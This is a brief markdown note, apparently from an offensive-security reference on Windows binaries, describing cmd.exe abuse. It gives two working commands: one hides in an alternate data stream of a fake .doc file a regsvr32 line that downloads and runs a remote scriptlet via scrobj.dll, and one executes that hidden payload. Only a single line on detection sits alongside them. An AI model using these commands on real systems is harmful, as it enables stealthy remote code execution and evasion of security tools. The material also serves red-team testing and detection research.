~/Privilege Escalation/Windows/Binaries# cat Cmd.exe.md

The command-line interpreter in Windows

Paths:

C:\Windows\System32\cmd.exe
C:\Windows\SysWOW64\cmd.exe

Detection: cmd.exe executing files from alternate data streams.

Alternate data streams

Add content to an Alternate Data Stream (ADS).

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat

Execute payload.bat stored in an Alternate Data Stream (ADS).

cmd.exe - < fakefile.doc:payload.bat